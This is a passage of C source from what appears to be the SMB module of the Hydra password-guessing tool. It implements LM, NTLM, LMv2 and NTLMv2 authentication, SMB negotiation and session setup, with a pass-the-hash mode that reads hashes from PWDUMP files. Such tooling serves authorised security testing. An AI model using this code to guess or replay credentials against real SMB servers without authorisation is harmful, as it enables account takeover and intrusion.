challenge using each third as a key + Concatenate three 8-byte resulting values to form 24-byte LM response + */ + DesEncrypt(challenge, &lm_hash[0], &lm_response[0]); + DesEncrypt(challenge, &lm_hash[7], &lm_response[8]); + DesEncrypt(challenge, &lm_hash[14], &lm_response[16]); + + memcpy(*lmhash, lm_response, 24); + + return 0; +} + + +/* + MakeNTLM + Function: Create a NTLM hash from the password +*/ +int MakeNTLM(unsigned char *ntlmhash, unsigned char *pass) { + MD4_CTX md4Context; + unsigned char hash[16]; /* MD4_SIGNATURE_SIZE = 16 */ + unsigned char unicodePassword[256 * 2]; /* MAX_NT_PASSWORD = 256 */ + int i = 0, j = 0; + int mdlen; + unsigned char *p = NULL; + char HexChar; + int HexValue; + + /* Use NTLM Hash instead of password */ + if (hashFlag == 1) { + /* 1000:D42E35E1A1E4C22BD32E2170E4857C20:5E20780DD45857A68402938C7629D3B2::: */ + p = pass; + while ((*p != '\0') && (i < 1)) { + if (*p == ':') + i++; + p++; + } + + if (*p == '\0') { + hydra_report(stderr, "[ERROR] reading PWDUMP file.\n"); + return -1; + } + + for (i = 0; i < 16; i++) { + HexValue = 0x0; + for (j = 0; j < 2; j++) { + HexChar = (char) p[2 * i + j]; + + if (HexChar > 0x39) + HexChar = HexChar | 0x20; /* convert upper case to lower */ + + if (!(((HexChar >= 0x30) && (HexChar <= 0x39)) || /* 0 - 9 */ + ((HexChar >= 0x61) && (HexChar <= 0x66)))) { /* a - f */ + /* + * fprintf(stderr, "Error invalid char (%c) for hash.\n", HexChar); + * hydra_child_exit(0); + */ + HexChar = 0x30; + } + + HexChar -= 0x30; + if (HexChar > 0x09) /* HexChar is "a" - "f" */ + HexChar -= 0x27; + + HexValue = (HexValue << 4) | (char) HexChar; + } + hash[i] = (unsigned char) HexValue; + } + } else { + /* Password == Machine Name */ + if (hashFlag == 2) { + for (i = 0; i < 16; i++) { + if (machine_name[i] > 0x39) + machine_name[i] = machine_name[i] | 0x20; /* convert upper case to lower */ + pass = machine_name; + } + } + + /* Initialize the Unicode version of the secret (== password). */ + /* This implicitly supports most UTF8 characters. */ + + j = UTF8_UTF16LE(pass, strlen((char *) pass), unicodePassword, sizeof(unicodePassword)); + + mdlen = j; /* length in bytes */ + + MD4_Init(&md4Context); + MD4_Update(&md4Context, unicodePassword, mdlen); + MD4_Final(hash, &md4Context); /* Tell MD4 we're done */ + } + + memcpy(ntlmhash, hash, 16); + return 0; +} + +/* + HashLMv2 + + This function implements the LMv2 response algorithm. The LMv2 response is used to + provide pass-through authentication compatibility with older servers. The response + is based on the NTLM password hash and is exactly 24 bytes. + + The below code is based heavily on the following resources: + + http://davenport.sourceforge.net/ntlm.html#theLmv2Response + samba-3.0.28a - libsmb/smbencrypt.c + jcifs - packet capture of LMv2-only connection +*/ +int HashLMv2(unsigned char **LMv2hash, unsigned char *szLogin, unsigned char *szPassword) { + unsigned char ntlm_hash[16]; + unsigned char lmv2_response[24]; + unsigned char unicodeUsername[20 * 2]; + unsigned char unicodeTarget[256 * 2]; + HMACMD5Context ctx; + unsigned char kr_buf[16]; + int ret, i; + unsigned char client_challenge[8] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 }; + + memset(ntlm_hash, 0, 16); + memset(lmv2_response, 0, 24); + memset(kr_buf, 0, 16); + + /* --- HMAC #1 Caculations --- */ + + /* Calculate and set NTLM password hash */ + ret = MakeNTLM((unsigned char *) &ntlm_hash, (unsigned char *) szPassword); + if (ret == -1) + return -1; + + /* + The Unicode uppercase username is concatenated with the Unicode authentication target + (the domain or server name specified in the Target Name field of the Type 3 message). + Note that this calculation always uses the Unicode representation, even if OEM encoding + has been negotiated; also note that the username is converted to uppercase, while the + authentication target is case-sensitive and must match the case presented in the Target + Name field. + + The HMAC-MD5 message authentication code algorithm (described in RFC 2104) is applied to + this value using the 16-byte NTLM hash as the key. This results in a 16-byte value - the + NTLMv2 hash. + */ + + /* Initialize the Unicode version of the username and target. */ + /* This implicitly supports 8-bit ISO8859/1 characters. */ + /* convert lower case characters to upper case */ + bzero(unicodeUsername, sizeof(unicodeUsername)); + for (i = 0; i < strlen((char *) szLogin); i++) { + if ((szLogin[i] >= 0x61) && (szLogin[i] <= 0x7a)) /* a - z */ + unicodeUsername[i * 2] = (unsigned char) szLogin[i] - 0x20; + else + unicodeUsername[i * 2] = (unsigned char) szLogin[i]; + } + + bzero(unicodeTarget, sizeof(unicodeTarget)); + for (i = 0; i < strlen((char *) workgroup); i++) + unicodeTarget[i * 2] = (unsigned char) workgroup[i]; + + hmac_md5_init_limK_to_64(ntlm_hash, 16, &ctx); + hmac_md5_update((const unsigned char *) unicodeUsername, 2 * strlen((char *) szLogin), &ctx); + hmac_md5_update((const unsigned char *) unicodeTarget, 2 * strlen((char *) workgroup), &ctx); + hmac_md5_final(kr_buf, &ctx); + + /* --- HMAC #2 Calculations --- */ + /* + The challenge from the Type 2 message is concatenated with our fixed client nonce. The HMAC-MD5 + message authentication code algorithm is applied to this value using the 16-byte NTLMv2 hash + (calculated above) as the key. This results in a 16-byte output value. + */ + + hmac_md5_init_limK_to_64(kr_buf, 16, &ctx); + hmac_md5_update((const unsigned char *) challenge, 8, &ctx); + hmac_md5_update(client_challenge, 8, &ctx); + hmac_md5_final(lmv2_response, &ctx); + + /* --- 24-byte LMv2 Response Complete --- */ + *LMv2hash = malloc(24); + memset(*LMv2hash, 0, 24); + memcpy(*LMv2hash, lmv2_response, 16); + memcpy(*LMv2hash + 16, client_challenge, 8); + + return 0; +} + +/* + HashNTLMv2 + + This function implements the NTLMv2 response algorithm. Support for this algorithm + was added with Microsoft Windows with NT 4.0 SP4. It should be noted that code doesn't + currently work with Microsoft Vista. While NTLMv2 authentication with Samba and Windows + 2003 functions as expected, Vista systems respond with the oh-so-helpful + "INVALID_PARAMETER" error code. LMv2-only authentication appears to work against Vista + in cases where LM and NTLM are refused. + + The below code is based heavily on the following two resources: + + http://davenport.sourceforge.net/ntlm.html#theNtlmv2Response + samba-3.0.28 - libsmb/smbencrypt.c + + NTLMv2 network authentication is required when attempting to authenticated to + a system which has the following policy enforced: + + GPO: "Network Security: LAN Manager authentication level" + Setting: "Send NTLMv2 response only\refuse LM & NTLM" +*/ +int HashNTLMv2(unsigned char **NTLMv2hash, int *iByteCount, unsigned char *szLogin, unsigned char *szPassword) { + unsigned char ntlm_hash[16]; + unsigned char ntlmv2_response[56 + 20 * 2 + 256 * 2]; + unsigned char unicodeUsername[20 * 2]; + unsigned char unicodeTarget[256 * 2]; + HMACMD5Context ctx; + unsigned char kr_buf[16]; + int ret, i, iTargetLen; + unsigned char client_challenge[8] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 }; + + /* + -- Example NTLMv2 Response Data -- + + [0] HMAC: (16 bytes) + + [16] Header: Blob Signature [01 01 00 00] (4 bytes) + [20] Reserved: [00 00 00 00] (4 bytes) + [24] Time: Little-endian, 64-bit signed value representing the number of + tenths of a microsecond since January 1, 1601. (8 bytes) + [32] Client Nonce: (8 bytes) + [40] Unknown: 00 00 00 00 (4 bytes) + [44] Target Information (from the Type 2 message) + NetBIOS domain/workgroup: + Type: domain 02 00 (2 bytes) + Length: 12 00 (2 bytes) + Name: WORKGROUP [NULL spacing -> 57 00 4f 00 ...] (18 bytes) + End-of-list: 00 00 00 00 (4 bytes) + Termination: 00 00 00 00 (4 bytes) + */ + + + iTargetLen = 2 * strlen((char *) workgroup); + + memset(ntlm_hash, 0, 16); + memset(ntlmv2_response, 0, 56 + 20 * 2 + 256 * 2); + memset(kr_buf, 0, 16); + + /* --- HMAC #1 Caculations --- */ + + /* Calculate and set NTLM password hash */ + ret = MakeNTLM((unsigned char *) &ntlm_hash, (unsigned char *) szPassword); + if (ret == -1) + return -1; + + /* + The Unicode uppercase username is concatenated with the Unicode authentication target + (the domain or server name specified in the Target Name field of the Type 3 message). + Note that this calculation always uses the Unicode representation, even if OEM encoding + has been negotiated; also note that the username is converted to uppercase, while the + authentication target is case-sensitive and must match the case presented in the Target + Name field. + + The HMAC-MD5 message authentication code algorithm (described in RFC 2104) is applied to + this value using the 16-byte NTLM hash as the key. This results in a 16-byte value - the + NTLMv2 hash. + */ + + /* Initialize the Unicode version of the username and target. */ + /* This implicitly supports 8-bit ISO8859/1 characters. */ + /* convert lower case characters to upper case */ + bzero(unicodeUsername, sizeof(unicodeUsername)); + for (i = 0; i < strlen((char *) szLogin); i++) { + if ((szLogin[i] >= 0x61) && (szLogin[i] <= 0x7a)) /* a - z */ + unicodeUsername[i * 2] = (unsigned char) szLogin[i] - 0x20; + else + unicodeUsername[i * 2] = (unsigned char) szLogin[i]; + } + + bzero(unicodeTarget, sizeof(unicodeTarget)); + for (i = 0; i < strlen((char *) workgroup); i++) + unicodeTarget[i * 2] = (unsigned char) workgroup[i]; + + hmac_md5_init_limK_to_64(ntlm_hash, 16, &ctx); + hmac_md5_update((const unsigned char *) unicodeUsername, 2 * strlen((char *) szLogin), &ctx); + hmac_md5_update((const unsigned char *) unicodeTarget, 2 * strlen((char *) workgroup), &ctx); + hmac_md5_final(kr_buf, &ctx); + + /* --- Blob Construction --- */ + + memset(ntlmv2_response + 16, 1, 2); /* Blob Signature 0x01010000 */ + memset(ntlmv2_response + 18, 0, 2); + memset(ntlmv2_response + 20, 0, 4); /* Reserved */ + + /* Time -- Take a Unix time and convert to an NT TIME structure: + Little-endian, 64-bit signed value representing the number of tenths of a + microsecond since January 1, 1601. + */ + struct timespec ts; + unsigned long long nt; + + ts.tv_sec = (time_t) time(NULL); + ts.tv_nsec = 0; + + if (ts.tv_sec == 0) + nt = 0; + else if (ts.tv_sec == TIME_T_MAX) + nt = 0x7fffffffffffffffLL; + else if (ts.tv_sec == (time_t) - 1) + nt = (unsigned long) -1; + else { + nt = ts.tv_sec; + nt += TIME_FIXUP_CONSTANT_INT; + nt *= 1000 * 1000 * 10; /* nt is now in the 100ns units */ + } + + SIVAL(ntlmv2_response + 24, 0, nt & 0xFFFFFFFF); + SIVAL(ntlmv2_response + 24, 4, nt >> 32); + /* End time calculation */ + + /* Set client challenge - using a non-random value in this case. */ + memcpy(ntlmv2_response + 32, client_challenge, 8); /* Client Nonce */ + memset(ntlmv2_response + 40, 0, 4); /* Unknown */ + + /* Target Information Block */ + /* + 0x0100 Server name + 0x0200 Domain name + 0x0300 Fully-qualified DNS host name + 0x0400 DNS domain name + + TODO: Need to rework negotiation code to correctly extract target information + */ + + memset(ntlmv2_response + 44, 0x02, 1); /* Type: Domain */ + memset(ntlmv2_response + 45, 0x00, 1); + memset(ntlmv2_response + 46, iTargetLen, 1); /* Length */ + memset(ntlmv2_response + 47, 0x00, 1); + + /* Name of domain or workgroup */ + for (i = 0; i < strlen((char *) workgroup); i++) + ntlmv2_response[48 + i * 2] = (unsigned char) workgroup[i]; + + memset(ntlmv2_response + 48 + iTargetLen, 0, 4); /* End-of-list */ + + /* --- HMAC #2 Caculations --- */ + + /* + The challenge from the Type 2 message is concatenated with the blob. The HMAC-MD5 message + authentication code algorithm is applied to this value using the 16-byte NTLMv2 hash + (calculated above) as the key. This results in a 16-byte output value. + */ + + hmac_md5_init_limK_to_64(kr_buf, 16, &ctx); + hmac_md5_update(challenge, 8, &ctx); + hmac_md5_update(ntlmv2_response + 16, 48 - 16 + iTargetLen + 4, &ctx); + hmac_md5_final(ntlmv2_response, &ctx); + + *iByteCount = 48 + iTargetLen + 4; + *NTLMv2hash = malloc(*iByteCount); + memset(*NTLMv2hash, 0, *iByteCount); + memcpy(*NTLMv2hash, ntlmv2_response, *iByteCount); + + return 0; +} + +/* + HashNTLM + Function: Create a NTLM hash from the challenge + Variables: + ntlmhash = the hash created from this function + pass = users password + challenge = the challenge recieved from the server +*/ +int HashNTLM(unsigned char **ntlmhash, unsigned char *pass, unsigned char *challenge, char *miscptr) { + int ret; + unsigned char hash[16]; /* MD4_SIGNATURE_SIZE = 16 */ + unsigned char p21[21]; + unsigned char ntlm_response[24]; + + ret = MakeNTLM((unsigned char *) &hash, (unsigned char *) pass); + if (ret == -1) + hydra_child_exit(0); + + memset(p21, '\0', 21); + memcpy(p21, hash, 16); + + DesEncrypt(challenge, p21 + 0, ntlm_response + 0); + DesEncrypt(challenge, p21 + 7, ntlm_response + 8); + DesEncrypt(challenge, p21 + 14, ntlm_response + 16); + + memcpy(*ntlmhash, ntlm_response, 24); + + return 0; +} + +/* + NBS Session Request + Function: Request a new session from the server + Returns: TRUE on success else FALSE. +*/ +int NBSSessionRequest(int s) { + char nb_name[32]; /* netbiosname */ + char nb_local[32]; /* netbios localredirector */ + unsigned char rqbuf[7] = { 0x81, 0x00, 0x00, 0x44, 0x20, 0x00, 0x20 }; + char *buf; + unsigned char rbuf[400]; + + /* if we are running in native mode (aka port 445) don't do netbios */ + if (protoFlag == WIN2000_NATIVEMODE) + return 0; + + /* convert computer name to netbios name */ + memset(nb_name, 0, 32); + memset(nb_local, 0, 32); + memcpy(nb_name, "CKFDENECFDEFFCFGEFFCCACACACACACA", 32); /* *SMBSERVER */ + memcpy(nb_local, "EIFJEEFCEBCACACACACACACACACACACA", 32); /* HYDRA */ + + buf = (char *) malloc(100); + memset(buf, 0, 100); + memcpy(buf, (char *) rqbuf, 5); + memcpy(buf + 5, nb_name, 32); + memcpy(buf + 37, (char *) rqbuf + 5, 2); + memcpy(buf + 39, nb_local, 32); + memcpy(buf + 71, (char *) rqbuf + 5, 1); + + hydra_send(s, buf, 72, 0); + free(buf); + + memset(rbuf, 0, 400); + hydra_recv(s, (char *) rbuf, sizeof(rbuf)); + + + if ((rbuf != NULL) && (rbuf[0] == 0x82)) + return 0; /* success */ + else + return -1; /* failed */ +} + + +/* + SMBNegProt + Function: Negotiate protocol with server ... + Actually a pseudo negotiation since the whole + program counts on NTLM support :) + + The challenge is retrieved from the answer + No error checking is performed i.e cross your fingers.... +*/ +int SMBNegProt(int s) { + unsigned char buf[] = { + 0x00, 0x00, 0x00, 0xbe, 0xff, 0x53, 0x4d, 0x42, + 0x72, 0x00, 0x00, 0x00, 0x00, 0x08, 0x01, 0xc0, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c, 0x7d, + 0x00, 0x00, 0x01, 0x00, 0x00, 0x9b, 0x00, 0x02, + 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, + 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, + 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, + 0x4d, 0x49, 0x43, 0x52, 0x4f, 0x53, 0x4f, 0x46, + 0x54, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, 0x52, + 0x4b, 0x53, 0x20, 0x31, 0x2e, 0x30, 0x33, 0x00, + 0x02, 0x4d, 0x49, 0x43, 0x52, 0x4f, 0x53, 0x4f, + 0x46, 0x54, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, + 0x52, 0x4b, 0x53, 0x20, 0x33, 0x2e, 0x30, 0x00, + 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, + 0x2e, 0x30, 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, + 0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x44, + 0x4f, 0x53, 0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, + 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4c, 0x41, + 0x4e, 0x4d, 0x41, 0x4e, 0x32, 0x2e, 0x31, 0x00, + 0x02, 0x53, 0x61, 0x6d, 0x62, 0x61, 0x00, 0x02, + 0x4e, 0x54, 0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, + 0x4e, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4e, + 0x54, 0x20, 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, + 0x32, 0x00 + +/* +0x02, + 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, + 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, + 0x41, 0x4d, 0x20, 0x31, 0x2e, 0x30, 0x00, 0x02, + 0x4d, 0x49, 0x43, 0x52, 0x4f, 0x53, 0x4f, 0x46, + 0x54, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, 0x52, + 0x4b, 0x53, 0x20, 0x31, 0x2e, 0x30, 0x33, 0x00, + 0x02, 0x4d, 0x49, 0x43, 0x52, 0x4f, 0x53, 0x4f, + 0x46, 0x54, 0x20, 0x4e, 0x45, 0x54, 0x57, 0x4f, + 0x52, 0x4b, 0x53, 0x20, 0x33, 0x2e, 0x30, 0x00, + 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, + 0x2e, 0x30, 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, + 0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x53, + 0x61, 0x6d, 0x62, 0x61, 0x00, 0x02, 0x4e, 0x54, + 0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x20, + 0x31, 0x2e, 0x30, 0x00, 0x02, 0x4e, 0x54, 0x20, + 0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00 +*/ + }; + + unsigned char rbuf[400]; + unsigned char sess_key[2]; + unsigned char userid[2] = { 0xCD, 0xEF }; + int i = 0, j = 0; + int iLength = 194; + int iResponseOffset = 73; + + memset((char *) rbuf, 0, 400); + + /* set session key */ + sess_key[1] = getpid() / 100; + sess_key[0] = getpid() - (100 * sess_key[1]); + memcpy(buf + 30, sess_key, 2); + memcpy(buf + 32, userid, 2); + + + + if (smb_auth_mechanism == AUTH_LM) { + if (verbose) + hydra_report(stderr, "[VERBOSE] Setting Negotiate Protocol Response for LM.\n"); + buf[3] = 0xA3; // Set message length + buf[37] = 0x80; // Set byte count for dialects + iLength = 167; + iResponseOffset = 65; + } + + + hydra_send(s, (char *) buf, iLength, 0); + hydra_recv(s, (char *) rbuf, sizeof(rbuf)); + if (rbuf == NULL) + return 3; + + /* retrieve the security mode */ + /* + [0] Mode: (0) ? (1) USER security mode + [1] Password: (0) PLAINTEXT password (1) ENCRYPTED password. Use challenge/response + [2] Signatures: (0) Security signatures NOT enabled (1) ENABLED + [3] Sig Req: (0) Security signatures NOT required (1) REQUIRED + + SAMBA: 0x01 (default) + WinXP: 0x0F (default) + WinXP: 0x07 (Windows 2003 / DC) + */ + switch (rbuf[39]) { + case 0x01: + //real plaintext should be used with LM auth + if (verbose) + hydra_report(stderr, "[VERBOSE] Server requested PLAINTEXT password.\n"); + security_mode = PLAINTEXT; + + if (hashFlag == 1) { + if (verbose) + hydra_report(stderr, "[VERBOSE] Server requested PLAINTEXT password. HASH password mode not supported for this configuration.\n"); + return 3; + } + if (hashFlag == 2) { + if (verbose) + hydra_report(stderr, "[VERBOSE] Server requested PLAINTEXT password. MACHINE password mode not supported for this configuration.\n"); + return 3; + } + break; + case 0x03: + if (verbose) + hydra_report(stderr, "[VERBOSE] Server requested ENCRYPTED password without security signatures.\n"); + security_mode = ENCRYPTED; + break; + case 0x07: + case 0x0F: + if (verbose) + hydra_report(stderr, "[VERBOSE] Server requested ENCRYPTED password.\n"); + security_mode = ENCRYPTED; + break; + default: + if (verbose) + hydra_report(stderr, "[VERBOSE] Unknown security mode request: %2.2X. Proceeding using ENCRYPTED password mode.\n", rbuf[39]); + security_mode = ENCRYPTED; + break; + } + + /* Retrieve the challenge */ + memcpy(challenge, (char *) rbuf + iResponseOffset, sizeof(challenge)); + + /* Find the primary domain/workgroup name */ + memset(workgroup, 0, 16); + memset(machine_name, 0, 16); + + //seems using LM only the domain is returned not the server + //and the domain is not padded with null chars + if (smb_auth_mechanism == AUTH_LM) { + while ((rbuf[iResponseOffset + 8 + i] != 0) && (i < 16)) { + workgroup[i] = rbuf[iResponseOffset + 8 + i]; + i++; + } + } else { + while ((rbuf[iResponseOffset + 8 + i * 2] != 0) && (i < 16)) { + workgroup[i] = rbuf[iResponseOffset + 8 + i * 2]; + i++; + } + + while ((rbuf[iResponseOffset + 8 + (i + j + 1) * 2] != 0) && (j < 16)) { + machine_name[j] = rbuf[iResponseOffset + 8 + (i + j + 1) * 2]; + j++; + } + } + + if (verbose) { + hydra_report(stderr, "[VERBOSE] Server machine name: %s\n", machine_name); + hydra_report(stderr, "[VERBOSE] Server primary domain: %s\n", workgroup); + } + //success + return 2; +} + + + +/* + SMBSessionSetup + Function: Send username + response to the challenge from + the server. + Returns: TRUE on success else FALSE. +*/ +unsigned long SMBSessionSetup(int s, char *szLogin, char *szPassword, char *miscptr) { + unsigned char buf[512]; + unsigned char *LMv2hash = NULL; + unsigned char *NTLMv2hash = NULL; + unsigned char *NTLMhash = NULL; + unsigned char *LMhash = NULL; + unsigned char unicodeLogin[32 * 2]; + int j; + char bufReceive[512]; + int nReceiveBufferSize = 0; + int ret; + int iByteCount = 0, iOffset = 0; + + if (accntFlag == 0) { + strcpy((char *) workgroup, "localhost"); + + } else if (accntFlag == 2) { + memset(workgroup, 0, 16); + } + //domain flag is not needed here, it will be auto set, + //below it's domain specified on cmd line + else if (accntFlag == 4) { + strncpy((char *) workgroup, (char *) domain, 16); + } + + /* NetBIOS Session Service */ + unsigned char szNBSS[4] = { + 0x00, /* Message Type: Session Message */ + 0x00, 0x00, 0x85 /* Length -- MUST SET */ + }; + + /* SMB Header */ + unsigned char szSMB[32] = { + 0xff, 0x53, 0x4d, 0x42, /* Server Component */ + 0x73, /* SMB Command: Session Setup AndX */ + 0x00, 0x00, 0x00, 0x00, /* NT Status: STATUS_SUCCESS */ + 0x08, /* Flags */ + 0x01, 0xc0, /* Flags2 */ /* add Unicode */ + 0x00, 0x00, /* Process ID High */ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Signature */ + 0x00, 0x00, /* Reserved */ + 0x00, 0x00, /* Tree ID */ + 0x13, 0x37, /* Process ID */ + 0x00, 0x00, /* User ID */ + 0x01, 0x00 /* Multiplx ID */ + }; + + memset(buf, 0, 512); + memcpy(buf, szNBSS, 4); + memcpy(buf + 4, szSMB, 32); + + if (security_mode == ENCRYPTED) { + /* Session Setup AndX Request */ + if (smb_auth_mechanism == AUTH_LM) { + if (verbose) + hydra_report(stderr, "[VERBOSE] Attempting LM password authentication.\n"); + + unsigned char szSessionRequest[23] = { + 0x0a, /* Word Count */ + 0xff, /* AndXCommand: No further commands */ + 0x00, /* Reserved */ + 0x00, 0x00, /* AndXOffset */ + 0xff, 0xff, /* Max Buffer */ + 0x02, 0x00, /* Max Mpx Count */ + 0x3c, 0x7d, /* VC Number */ + 0x00, 0x00, 0x00, 0x00, /* Session Key */ + 0x18, 0x00, /* LAN Manager Password Hash Length */ + 0x00, 0x00, 0x00, 0x00, /* Reserved */ + 0x49, 0x00 /* Byte Count -- MUST SET */ + }; + + iOffset = 59; /* szNBSS + szSMB + szSessionRequest */ + iByteCount = 24; /* Start with length of LM hash */ + + /* Set Session Setup AndX Request header information */ + memcpy(buf + 36, szSessionRequest, 23); + + /* Calculate and set LAN Manager password hash */ + LMhash = (unsigned char *) malloc(24); + memset(LMhash, 0, 24); + + ret = HashLM(&LMhash, (unsigned char *) szPassword, (unsigned char *) challenge); + if (ret == -1) + return -1; + + memcpy(buf + iOffset, LMhash, 24); + free(LMhash); + + } else if (smb_auth_mechanism == AUTH_NTLM) { + if (verbose) + hydra_report(stderr, "[VERBOSE] Attempting NTLM password authentication.\n"); + + unsigned char szSessionRequest[29] = { + 0x0d, /* Word Count */ + 0xff, /* AndXCommand: No further commands */ + 0x00, /* Reserved */ + 0x00, 0x00, /* AndXOffset */ + 0xff, 0xff, /* Max Buffer */ + 0x02, 0x00, /* Max Mpx Count */ + 0x3c, 0x7d, /* VC Number */ + 0x00, 0x00, 0x00, 0x00, /* Session Key */ + 0x18, 0x00, /* LAN Manager Password Hash Length */ + 0x18, 0x00, /* NT LAN Manager Password Hash Length */ + 0x00, 0x00, 0x00, 0x00, /* Reserved */ + 0x5c, 0x00, 0x00, 0x00, /* Capabilities */ /* Add Unicode */ + 0x49, 0x00 /* Byte Count -- MUST SET */ + }; + + iOffset = 65; /* szNBSS + szSMB + szSessionRequest */ + iByteCount = 48; /* Start with length of NTLM and LM hashes */ + + /* Set Session Setup AndX Request header information */ + memcpy(buf + 36, szSessionRequest, 29); + + /* Calculate and set NTLM password hash */ + NTLMhash = (unsigned char *) malloc(24); + memset(NTLMhash, 0, 24); + + /* We don't need to actually calculated a LM hash for this mode, only NTLM */ + ret = HashNTLM(&NTLMhash, (unsigned char *) szPassword, (unsigned char *) challenge, miscptr); + if (ret == -1) + return -1; + + memcpy(buf + iOffset + 24, NTLMhash, 24); /* Skip space for LM hash */ + free(NTLMhash); + } else if (smb_auth_mechanism == AUTH_LMv2) { + if (verbose) + hydra_report(stderr, "[VERBOSE] Attempting LMv2 password authentication.\n"); + + unsigned char szSessionRequest[29] = { + 0x0d, /* Word Count */ + 0xff, /* AndXCommand: No further commands */ + 0x00, /* Reserved */ + 0x00, 0x00, /* AndXOffset */ + 0xff, 0xff, /* Max Buffer */ + 0x02, 0x00, /* Max Mpx Count */ + 0x3c, 0x7d, /* VC Number */ + 0x00, 0x00, 0x00, 0x00, /* Session Key */ + 0x18, 0x00, /* LAN Manager Password Hash Length */ + 0x00, 0x00, /* NT LAN Manager Password Hash Length */ + 0x00, 0x00, 0x00, 0x00, /* Reserved */ + 0x50, 0x00, 0x00, 0x00, /* Capabilities */ + 0x49, 0x00 /* Byte Count -- MUST SET */ + }; + + iOffset = 65; /* szNBSS + szSMB + szSessionRequest */ + iByteCount = 24; /* Start with length of LMv2 response */ + + /* Set Session Setup AndX Request header information */ + memcpy(buf + 36, szSessionRequest, 29); + + /* Calculate and set LMv2 response hash */ + LMv2hash = (unsigned char *) malloc(24); + memset(LMv2hash, 0, 24); + + ret = HashLMv2(&LMv2hash, (unsigned char *) szLogin, (unsigned char *) szPassword); + if (ret == -1) + return -1; + + memcpy(buf + iOffset, LMv2hash, 24); + free(LMv2hash); + } else if (smb_auth_mechanism == AUTH_NTLMv2) { + if (verbose) + hydra_report(stderr, "[VERBOSE] Attempting LMv2/NTLMv2 password authentication.\n"); + + unsigned char szSessionRequest[29] = { + 0x0d, /* Word Count */ + 0xff, /* AndXCommand: No further commands */ + 0x00, /* Reserved */ + 0x00, 0x00, /* AndXOffset */ + 0xff, 0xff, /* Max Buffer */ + 0x02, 0x00, /* Max Mpx Count */ + 0x3c, 0x7d, /* VC Number */ + 0x00, 0x00, 0x00, 0x00, /* Session Key */ + 0x18, 0x00, /* LMv2 Response Hash Length */ + 0x4b, 0x00, /* NTLMv2 Response Hash Length -- MUST SET */ + 0x00, 0x00, 0x00, 0x00, /* Reserved */ + 0x50, 0x00, 0x00, 0x00, /* Capabilities */ + 0x49, 0x00 /* Byte Count -- MUST SET */ + }; + + iOffset = 65; /* szNBSS + szSMB + szSessionRequest */ + + /* Set Session Setup AndX Request header information */ + memcpy(buf + 36, szSessionRequest, 29); + + /* Calculate and set LMv2 response hash */ + ret = HashLMv2(&LMv2hash, (unsigned char *) szLogin, (unsigned char *) szPassword); + if (ret == -1) + return -1; + + memcpy(buf + iOffset, LMv2hash, 24); + free(LMv2hash); + + /* Calculate and set NTLMv2 response hash */ + ret = HashNTLMv2(&NTLMv2hash, &iByteCount, (unsigned char *) szLogin, (unsigned char *) szPassword); + if (ret == -1) + return -1; + + /* Set NTLMv2 Response Length */ + memset(buf + iOffset - 12, iByteCount, 1); + if (verbose) + hydra_report(stderr, "[VERBOSE] HashNTLMv2 response length: %d\n", iByteCount); + + memcpy(buf + iOffset + 24, NTLMv2hash, iByteCount); + free(NTLMv2hash); + + iByteCount += 24; /* Reflects length of both LMv2 and NTLMv2 responses */ + } + } else if (security_mode == PLAINTEXT) { + if (verbose) + hydra_report(stderr, "[VERBOSE] Attempting PLAINTEXT password authentication.\n"); + + unsigned char szSessionRequest[23] = { + 0x0a, /* Word Count */ + 0xff, /* AndXCommand: No further commands */ + 0x00, /* Reserved */ + 0x00, 0x00, /* AndXOffset */ + 0xff, 0xff, /* Max Buffer */ + 0x02, 0x00, /* Max Mpx Count */ + 0x3c, 0x7d, /* VC Number */ + 0x00, 0x00, 0x00, 0x00, /* Session Key */ + 0x00, 0x00, /* Password Length -- MUST SET */ + 0x00, 0x00, 0x00, 0x00, /* Reserved */ + 0x49, 0x00 /* Byte Count -- MUST SET */ + }; + + iOffset = 59; /* szNBSS + szSMB + szSessionRequest */ + + /* Set Session Setup AndX Request header information */ + memcpy(buf + 36, szSessionRequest, 23); + + /* Calculate and set password length */ + /* Samba appears to append NULL characters equal to the password length plus 2 */ + //iByteCount = 2 * strlen(szPassword) + 2; + iByteCount = strlen(szPassword) + 1; + buf[iOffset - 8] = (iByteCount) % 256; + buf[iOffset - 7] = (iByteCount) / 256; + + /* set ANSI password */ + /* + Depending on the SAMBA server configuration, multiple passwords may be successful + when dealing with mixed-case values. The SAMBA parameter "password level" appears + to determine how many characters within a password are tested by the server both + upper and lower case. For example, assume a SAMBA account has a password of "Fred" + and the server is configured with "password level = 2". Medusa sends the password + "FRED". The SAMBA server will brute-force test this value for us with values + like: "FRed", "FrEd", "FreD", "fREd", "fReD", "frED", ... The default setting + is "password level = 0". This results in only two attempts to being made by the + remote server; the password as is and the password in all-lower case. + */ + strncpy((char *) (buf + iOffset), szPassword, 256); + } else { + hydra_report(stderr, "[ERROR] Security_mode was not properly set. This should not happen.\n"); + return -1; + } + + /* Set account and 